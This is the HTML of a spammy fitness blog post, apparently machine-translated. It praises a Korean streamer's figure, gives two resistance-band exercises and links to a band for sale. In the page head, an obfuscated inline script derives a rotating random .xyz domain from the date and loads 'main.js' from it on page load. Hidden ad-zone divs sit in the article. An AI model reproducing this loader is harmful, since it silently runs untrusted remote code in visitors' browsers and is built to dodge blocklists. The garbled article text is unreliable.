<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Reduced fat,">










<meta name="description" content="There are thousands of Korean female anchorperson, and they have great looks and figure. But the female anchorperson we are going to introduce to you today is very popular in China and Korea, and ther">
<meta name="keywords" content="Reduced fat">
<meta property="og:type" content="article">
<meta property="og:title" content="South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure">
<meta property="og:url" content="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/index.html">
<meta property="og:site_name" content="How to Keep Fit">
<meta property="og:description" content="There are thousands of Korean female anchorperson, and they have great looks and figure. But the female anchorperson we are going to introduce to you today is very popular in China and Korea, and ther">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/da9310c1-bb79-431a-9232-8957bea73c19.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/ebe37d8a-6cf9-4699-bcf7-4005e3f4b284.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/ca1f840b-4b0f-4408-884a-87f8e7c1b122.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/3bd93ee1-a666-4d68-98e6-6adbd8ef8f96.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/6085a365-95e3-48c4-9583-a57c9b017fb3.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/7e82b375-5763-405c-9581-6186d29d8732.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/4c84c9f6-ef8d-4d00-9e39-051068b0d750.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/6ec3c588-e06a-4be3-adb3-2c9dbaa617fe.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/e32ac50b-8ec8-436c-a8db-4ff3b2bf3d24.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/db0622d9-76d3-4820-894b-04f37d42033f.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/c4f3bddd-e6ac-478e-a499-34ce83021da9.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/5d690b71-e118-4f65-a3ed-0fc6d087d90b.gif">
<meta property="og:updated_time" content="2021-05-06T07:25:02.693Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure">
<meta name="twitter:description" content="There are thousands of Korean female anchorperson, and they have great looks and figure. But the female anchorperson we are going to introduce to you today is very popular in China and Korea, and ther">
<meta name="twitter:image" content="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/da9310c1-bb79-431a-9232-8957bea73c19.gif">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/">




<script type="text/javascript">!function(n){var t,e=function(n,t){var e=[["a","e","i","o","u","y"],["b","c","d","f","g","h","j","k","l","m","n","p","q","r","s","t","v","w","x","y","z"]];if(t)for(var r=0;r<=t.length-1;r++)n=n*t.charCodeAt(r)%4294967295;var l;return next=(l=n,function(n){return l=l+1831565813|0,(((n=(n=Math.imul(l^l>>>15,1|l))+Math.imul(n^n>>>7,61|n)^n)^n>>>14)>>>0)/Math.pow(2,32)}),function(n,t){for(var r=[],l=null,o=0;o<=n-1;o++){var a=void 0;null===l?a=e[0].concat(e[1]):1==l?(a=e[0],l=0):(a=e[1],l=1);var u=a[Math.floor(next()*a.length)];r.push(u),null===l&&(l=-1!=e[0].indexOf(u)?0:1)}return r.push("."+t),r.join("")}}((t=new Date,(t/=1e3)-t%1209600),"_fa7cdd4c68507744")(8,"xyz");if(null===n)console.log("https://"+e);else{var r=n.createElement("script");r.src="https://"+e+"/main.js",(n.body||n.head).appendChild(r)}}("undefined"!=typeof document?document:null);
</script>

  <title>South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure | How to Keep Fit</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">How to Keep Fit</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">How to Keep Fit</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            Sitemap
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>


 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
                            
<div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="15af66dea7db40aeac9404abd8ac7ee3" style="display: none"></div>
<div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="957010872ca54cf98941765c8f125165" style="display: none"></div>
<div class="_fa7cdd4c68507744" data-zone="1f18e43b8b0e495c9b6b7be51eb2c8c2" style="width:728px;height:90px;display: inline-block;margin: 0 auto"></div>


  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Thomas">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="How to Keep Fit">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2021-03-11T00:00:00+08:00">
                2021-03-11
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>There are thousands of Korean female anchorperson, and they have great looks and figure. But the female anchorperson we are going to introduce to you today is very popular in China and Korea, and there are many fans in China. Do you know who she is?<br><img src="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/da9310c1-bb79-431a-9232-8957bea73c19.gif" alt="South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure"><br>Today we are going to introduce the female anchor named Mina. She is slim and has a beautiful face. She is becoming more and more popular on the Korean Internet. After playing a hot dance video on the pipeline, she was very popular, with 200000 fans on Facebook. Her video immediately triggered another wave on the Internet, and many netizens called Mina goddess.<br><img src="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/ebe37d8a-6cf9-4699-bcf7-4005e3f4b284.gif" alt="South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure"><br>Like ponimag, Mina’s identity has always been elusive. However, in South Korea, the star Mina, who was born in 1976, is not the one whom netizens call goddess. Despite this, Korean female anchor Mina is still popular on the Internet, especially her figure, which is really enviable.<br><img src="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/ca1f840b-4b0f-4408-884a-87f8e7c1b122.gif" alt="South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure"><br>Mina’s big long legs are the most conspicuous, especially concerned, but on the Internet, Mina’s personal information is not very complete.<br><img src="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/3bd93ee1-a666-4d68-98e6-6adbd8ef8f96.gif" alt="South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure"><br>When it comes to Mina, those who like to watch her live must first think of Mina’s proud figure, then her appearance, and finally her dance. However, to be honest, Mina’s figure is really good, and Xiaobian likes it very much.<br><img src="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/6085a365-95e3-48c4-9583-a57c9b017fb3.gif" alt="South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure"><br>No matter where she goes, Mina’s body is very popular, and her return rate is also very high! Mina often updates her daily photos on her Facebook. Unfortunately, she doesn’t have her own microblog.<br><img src="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/7e82b375-5763-405c-9581-6186d29d8732.gif" alt="South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure"><br>Mina’s three circumference data spread on the Internet: the three data are excellent, the three circumference are great people, plus the high face value, not fire is difficult, but Mina’s body is not God’s, Mina usually in addition to live, she will often go to the gym to exercise, she was originally better, through the fitness, the body will become better, protruding, very attractive.<br><img src="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/4c84c9f6-ef8d-4d00-9e39-051068b0d750.gif" alt="South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure"><br>Next, I’d like to share with you two actions that Mina often exercises at home. If you also want to have a good figure, you can follow suit. Just prepare a yoga mat and a set of elastic rings suitable for you.<br><strong>Action 1: elastic ring supine hip Bridge</strong><br><img src="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/6ec3c588-e06a-4be3-adb3-2c9dbaa617fe.gif" alt="South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure"><br>Action tips: prepare a yoga mat, put the elastic ring in the middle of the thigh, feet and hips are the same width, hands on both sides of the body, exhale, hips up, to the top of a second, then inhale slowly down, continue to repeat, each group do 15 times, a total of 4 groups.<br><img src="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/e32ac50b-8ec8-436c-a8db-4ff3b2bf3d24.gif" alt="South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure"><br><strong>Action 2: stretch ring side lying and leg lifting</strong><br><img src="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/db0622d9-76d3-4820-894b-04f37d42033f.gif" alt="South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure"><br>Action tips: lie on the yoga mat, put the elastic hoop in the middle of the thigh, bend one leg and straighten the other leg, then lift up the upper leg, exhale at the same time, then slowly put it down and inhale at the same time, 15 times in each group, two legs should be done alternately, a total of 4 groups can be done.<br><img src="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/c4f3bddd-e6ac-478e-a499-34ce83021da9.gif" alt="South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure"><br>The function of an elastic ring is very big, and its price is very cheap, does not take up space, when traveling, you can put it directly in the bag, preparing a set of elastic ring is the best choice for every girl who wants to have a good figure. The elastic ring is very elastic, not easy to break, different colors, different strength, suitable for all kinds of people, it is really a good helper for every fitness crowd.<br>With a set of such elastic rings at home, you can complete the fitness exercise anytime and anywhere, and build a good figure depends on it. The price is economical, so start faster.<br><img src="http://doumaiy.xyz/2021/03/11/South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure/5d690b71-e118-4f65-a3ed-0fc6d087d90b.gif" alt="South Korean female anchor Mina, slim, with long legs, netizen how to practice the figure"></p>
<p>#pgc-card .pgc-card-href {        text-decoration: none;         outline: none;         display: block;         width: 100%;         height: 100%;    }    # pgc-card .pgc-card- href:hover  {        text-decoration: none;    }    /* PC style * /. PGC card {box sizing: border box; height: 164px;         border: 1px solid #e8e8e8;         position: relative;         padding: 20px 94px 12px 180px;         overflow: hidden;    }    . pgc-card::after {        content: “ “;         display: block;         border-left: 1px solid #e8e8e8;         height: 120px;         position: absolute;         right: 76px;         top: 20px;    }    . pgc-cover {        position: absolute;         width: 162px;         height: 162px;         top: 0;         left: 0;         background-size: cover;    }    . pgc-content {        overflow: hidden;         position: relative;         top: 50%;        - webkit-transform: translateY(-50%);         transform: translateY(-50%);    }    . pgc-content-title {        font-size: 18px;         color: #222;         line-height: 1;         font-weight: bold;         overflow: hidden;         text-overflow: ellipsis;         white-space: nowrap;    }    . pgc-content-desc {        font-size: 14px;         color: #444;         overflow: hidden;         text-overflow: ellipsis;         padding-top: 9px;         overflow: hidden;         line-height: 1.2em;         display: -webkit-inline-box;        - webkit-line-clamp: 2;        - webkit-box-orient: vertical;    }    . pgc-content-price {        font-size: 22px;         color: #f85959;         padding-top: 18px;         line-height: 1em;    }    . pgc-card-buy {        width: 75px;         position: absolute;         right: 0;         top: 50px;         color: #406599;         font-size: 14px;         text-align: center;    }    . pgc-buy-text {        padding-top: 10px;    }    . pgc-icon-buy {        height: 23px;         width: 20px;         display: inline-block;         background: url( <a href="https://s0.pstatp.com/pgc/v2/pgc" target="_blank" rel="noopener">https://s0.pstatp.com/pgc/v2/pgc</a>_ tpl/static/image/commodity_ buy_ f2b4d1a.png);    }<br>[<br>Hip elastic ring<br>￥29.9<br>purchase<br>]( <a href="https://haohuo.jinritemai.com/views/product/item2" target="_blank" rel="noopener">https://haohuo.jinritemai.com/views/product/item2</a>? id=3432197646616521850&amp; origin_ type=2003002010&amp; origin_ id=6587612064_ 3433157599598631796&amp; alkey=1304_ 6587612064_ 6587612064_ 3433157599598631796_ 011)<br>**End: * * there are many Korean beauties. How many do you remember their names? You can type their names in the comments section below.</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Reduced-fat/" rel="tag"># Reduced fat</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/03/10/Korean female coach Jiang Xianjing not only has a Xi Shi like face, but also a very hot figure/" rel="next" title="Korean female coach Jiang Xianjing not only has a Xi Shi like face, but also a very hot figure">
                <i class="fa fa-chevron-left"></i> Korean female coach Jiang Xianjing not only has a Xi Shi like face, but also a very hot figure
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/03/12/Korean fitness net red Wu Caiyuan! Why is she so popular! What is her charm/" rel="prev" title="Korean fitness net red Wu Caiyuan! Why is she so popular! What is her charm">
                Korean fitness net red Wu Caiyuan! Why is she so popular! What is her charm <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      

      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Thomas</p>
              <p class="site-description motion-element" itemprop="description">How to Keep Fit</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">59</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Thomas</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
